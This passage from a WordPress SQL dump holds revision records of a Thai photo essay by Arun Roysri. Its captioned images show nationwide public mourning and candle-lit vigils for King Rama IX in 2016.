center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:01:37', '2018-11-12 08:01:37', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4403, 3, '2018-11-12 15:04:22', '2018-11-12 08:04:22', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" 